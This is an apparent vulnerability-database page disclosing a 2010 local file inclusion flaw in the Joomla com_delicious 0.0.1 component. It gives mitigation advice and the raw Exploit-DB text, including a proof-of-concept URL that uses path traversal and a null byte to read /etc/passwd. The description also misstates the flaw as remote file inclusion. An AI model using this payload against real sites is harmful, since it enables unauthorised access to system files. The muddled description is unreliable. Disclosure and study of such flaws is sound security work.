Joomla Component Delicious Bookmarks Local File Inclusion Vulnerability

vendor:

com_delicious

by:

AntiSecurity

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: com_delicious

Affected Version From: 0.0.1

Affected Version To: 0.0.1

Patch Exists: NO

Related CWE: N/A

CPE: a:attic.e-builds.com:com_delicious:0.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component Delicious Bookmarks Local File Inclusion Vulnerability

A local file inclusion vulnerability exists in com_delicious version 0.0.1. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to include a file from a remote server that contains malicious code, which can be executed on the vulnerable system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application. Additionally, the application should be configured to only allow access to files that are necessary for the application to function.

Source

Exploit-DB raw data:

===============================================================================================================


  [o] Joomla Component Delicious Bookmarks Local File Inclusion Vulnerability
 
       Software : com_delicious version 0.0.1
       Vendor   : http://attic.e-builds.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


===============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_delicious&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00


===============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11


===============================================================================================================


  [o] April 14 2010 - GMT +07:00 Jakarta, Indonesia